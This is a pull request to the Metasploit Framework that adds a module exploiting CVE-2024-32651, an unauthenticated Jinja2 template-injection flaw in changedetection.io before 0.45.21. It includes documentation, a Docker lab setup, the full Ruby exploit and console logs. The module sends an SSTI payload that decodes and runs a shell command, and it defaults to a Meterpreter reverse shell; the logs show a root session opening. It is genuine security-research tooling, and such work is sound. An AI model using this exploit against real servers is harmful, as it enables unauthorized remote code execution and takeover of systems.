### PR TITLE
Add changedetection.io unauthenticated RCE exploit (CVE-2024-32651)

### DIFF
--- a/documentation/modules/exploit/linux/http/changedetection_rce_cve_2024_32651.md
+++ b/documentation/modules/exploit/linux/http/changedetection_rce_cve_2024_32651.md
@@ -1,0 +1,77 @@
+## Vulnerable Application
+
+[changedetection.io](https://changedetection.io) is an open-source service for monitoring
+web pages and notifying the user if changes are detected. This application supports
+credentialed authentication, but it is disabled by default. Versions prior to 0.45.21
+utilize a non-sandboxed Jinja2 templating engine to render the title and body of
+notifications. Attackers are able to perform server-side template injection (SSTI) to
+achieve unauthenticated remote code execution (RCE).
+
+This module was tested against changedetection.io 0.45.20, the last vulnerable release
+(fixed in 0.45.21).
+
+### Setting up a test environment
+
+The application can be run with the following `docker-compose.yml`:
+
+```yaml
+services:
+  changedetection:
+    image: dgtlmoon/changedetection.io:0.45.20
+    container_name: cve-2024-32651-test
+    ports:
+      - "127.0.0.1:5000:5000"
+    environment:
+      - BASE_URL=http://127.0.0.1:5000
+    restart: "no"
+```
+
+Start it with `docker compose up -d`, then browse to `http://127.0.0.1:5000` and confirm
+it loads with no password prompt.
+
+## Verification Steps
+
+1. Do: `docker compose up -d`
+1. Start `msfconsole`
+1. Do: `use exploit/linux/http/changedetection_rce_cve_2024_32651`
+1. Do: `set RHOSTS [target IP]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `exploit`
+1. AutoCheck should run and you should get a Meterpreter session
+
+## Options
+
+### TARGETURI
+
+The base path to the changedetection.io application. (Default: `/`)
+
+## Scenarios
+
+### changedetection.io 0.45.20 (Docker, Linux)
+
+```
+msf > use exploit/linux/http/changedetection_rce_cve_2024_32651
+[*] Using configured payload cmd/unix/python/meterpreter_reverse_tcp
+msf exploit(linux/http/changedetection_rce_cve_2024_32651) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(linux/http/changedetection_rce_cve_2024_32651) > set LHOST 172.18.0.1
+LHOST => 172.18.0.1
+msf exploit(linux/http/changedetection_rce_cve_2024_32651) > exploit
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. changedetection.io 0.45.20
+[*] Acquired session cookie and CSRF token
+[*] Created watch 1a69378c-3083-4c91-8df3-7b5f6ae20376
+[*] send-test returned HTTP 200
+[*] Deleted watch 1a69378c-3083-4c91-8df3-7b5f6ae20376
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:34664)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : 277e21d36cba
+OS              : Linux 7.1.8-arch1-3 #1 SMP PREEMPT_DYNAMIC x86_64
+Architecture    : x64
+Meterpreter     : python/linux
+meterpreter > exit
+```

--- a/modules/exploits/linux/http/changedetection_rce_cve_2024_32651.rb
+++ b/modules/exploits/linux/http/changedetection_rce_cve_2024_32651.rb
@@ -1,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'changedetection.io Notification Jinja2 SSTI RCE',
+        'Description' => %q{
+          This module exploits Remote Code Execution (RCE) vulnerability (CVE-2024-32651) in changedetection.io which is a service for detecting and monitoring changes in web pages. Versions prior to 0.45.21 are vulnerable.
+
+          The vulnerability occurs when the application renders user-controlled notification fields (title and body) using a non-sandboxed Jinja2 environment. The default configuration does not require login credentials, so an unauthenticated attacker is able to create a watch and send a test notification containing a command-injected template. This allows the attacker to execute a payload as the user running the service.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Taylor "Goblin" Cox', # msf module
+          'Edoardo Ottavianelli', # discovery
+          'Zach Crosman' # poc
+        ],
+        'References' => [
+          ['CVE', '2024-32651'],
+          ['GHSA', '4r7v-whpg-8rx3'],
+          ['URL', 'https://github.com/zcrosman/cve-2024-32651']
+        ],
+        'DisclosureDate' => '2024-05-08',
+        'Privileged' => false,
+        'Targets' => [
+          ['Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD }]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp' },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+  )
+
+    register_options([
+      Opt::RPORT(5000),
+      OptString.new('TARGETURI', [true, 'Base URI to changedetection.io web app', '/'])
+    ])
+  end
+
+  def check
+    response = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    return CheckCode::Unknown('No response from target') unless response
+
+    match = response.body.match(/v(\d+\.\d+\.\d+)/)
+    return CheckCode::Unknown('changedetection.io') unless match
+
+    version = match[1]
+    if Rex::Version.new(version) < Rex::Version.new('0.45.21')
+      CheckCode::Appears("changedetection.io #{version}")
+    else
+      CheckCode::Safe("changedetection.io #{version}")
+    end
+  end
+
+  def exploit
+    response = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    fail_with(Failure::Unreachable, 'No response from target') unless response
+    @cookie = response.get_cookies
+    html = response.get_html_document
+    input = html.at('input[name="csrf_token"]')
+    fail_with(Failure::UnexpectedReply, 'CSRF token not found') unless input
+    csrftoken = input['value']
+
+    print_status('Acquired session cookie and CSRF token')
+
+    response2 = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'form', 'add', 'quickwatch'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'csrf_token' => csrftoken,
+        'url' => 'https://example.com',
+        'tags' => '',
+        'edit_and_watch_submit_button' => 'Edit > Watch',
+        'processor' => 'text_json_diff'
+      }
+    )
+    fail_with(Failure::UnexpectedReply, 'Failed to create watch') unless response2
+    @cookie = response2.get_cookies
+    @uuid = response2.headers['location'].to_s[%r{/edit/([0-9a-f-]{36})}, 1]
+    fail_with(Failure::UnexpectedReply, 'No UUID returned') unless @uuid
+    print_status("Created watch #{@uuid}")
+
+    b64 = Base64.strict_encode64(payload.encoded)
+    cmd = "echo #{b64}|base64 -d|sh"
+    ssti = <<~TEMPLATE
+      {% for x in ().__class__.__base__.__subclasses__() %}
+      {% if "warning" in x.__name__ %}
+      {{ x()._module.__builtins__['__import__']('os').popen("#{cmd}").read() }}
+      {% endif %}
+      {% endfor %}
+    TEMPLATE
+
+    response3 = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'notification', 'send-test', @uuid),
+      'cookie' => @cookie,
+      'headers' => { 'X-Csrftoken' => csrftoken },
+      'vars_post' => {
+        'notification_urls' => 'json://127.0.0.1',
+        'notification_title' => Rex::Text.rand_text_alpha(8),
+        'notification_body' => ssti,
+        'notification_format' => 'System default',
+        'tags' => '',
+        'window_url' => ''
+      }
+    )
+    print_status("send-test returned HTTP #{response3&.code}")
+
+    handler
+  end
+
+  def on_new_session(_session)
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api', 'delete'),
+      'cookie' => @cookie,
+      'vars_get' => { 'uuid' => @uuid }
+    )
+    print_status("Deleted watch #{@uuid}")
+  rescue StandardError => e
+    print_warning("Cleanup failed: #{e.message}")
+  end
+end


### PR DESCRIPTION
Thank you for contributing to Metasploit Framework! Your time and effort help make this project better for the entire security community. If you have questions at any point, reach out on [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or the [Metasploit Slack](https://metasploit.com/slack).

<!-- For trivial changes (typo fixes, comment corrections, minor doc edits): you may delete sections that don't apply. -->

<!-- PRs missing a description, verification steps, or test evidence will be closed. Each PR should address a single module, bug fix, or cohesive logical change. For full guidance, see CONTRIBUTING.md and the module acceptance guidelines linked below. If your PR is not yet complete, mark it as a draft. -->

## Description
Performs an unauthenticated server-side template injection to deliver a payload. Effective against changedetection.io versions prior to 0.45.21. Exploits user-controlled 'body' field rendered by non-sandboxed Jinja2 template engine. Tested on changedetection.io 0.45.20.
<!-- Describe what this change does. Be specific about the behavior being added or modified. -->



<!-- Explain why this change is needed. What problem does it solve or what improvement does it provide? -->



<!-- Reference any related GitHub issue(s) below (e.g., "Fixes #1234" or "Related to #5678"). Delete this line if not applicable. -->

## Breaking Changes
None
<!-- Does this PR change existing behavior, remove options, rename datastore settings, or alter API/mixin interfaces? If yes, describe what breaks and how users should adapt. Write "None" if not applicable. -->

## Verification Steps
The application can be run with the following `docker-compose.yml`:
```yaml
services:
  changedetection:
    image: dgtlmoon/changedetection.io:0.45.20
    container_name: cve-2024-32651-test
    ports:
      - "127.0.0.1:5000:5000"
    environment:
      - BASE_URL=http://127.0.0.1:5000
    restart: "no"
```
1. Do: `docker compose up -d`
1. Start `msfconsole`
1. Do: `use exploit/linux/http/changedetection_rce_cve_2024_32651`
1. Do: `set RHOSTS [target IP]`
1. Do: `set LHOST [attacker IP]`
1. Do: `exploit`
1. AutoCheck should run and you should get a Meterpreter session
<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

## Test Evidence
```
msf > use exploit/linux/http/changedetection_rce_cve_2024_32651
[*] Using configured payload cmd/unix/python/meterpreter_reverse_tcp
msf exploit(linux/http/changedetection_rce_cve_2024_32651) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(linux/http/changedetection_rce_cve_2024_32651) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(linux/http/changedetection_rce_cve_2024_32651) > exploit
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. changedetection.io 0.45.20
[*] Acquired session cookie and CSRF token
[*] Created watch 1a69378c-3083-4c91-8df3-7b5f6ae20376
[*] send-test returned HTTP 200
[*] Deleted watch 1a69378c-3083-4c91-8df3-7b5f6ae20376
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:34664)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : 277e21d36cba
OS              : Linux 7.1.8-arch1-3 #1 SMP PREEMPT_DYNAMIC x86_64
Architecture    : x64
Meterpreter     : python/linux
meterpreter > exit
```
<!-- Paste console output, screenshots, or links to screen recordings. Redact sensitive information. -->

<!-- For new modules: include output from the module's `check` method (if applicable) AND successful exploitation or execution against a controlled lab/test environment target. -->

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Arch Linux x86_64 |
| **Target Software/Hardware** | changedetection.io 0.45.20 |
| **Docker Image / Vagrant Setup** | dgtlmoon/changedetection.io:0.45.20 |

## AI Usage Disclosure
Claude Code Opus 4.8 was used for code/document review and debugging.
<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->



## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->


<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
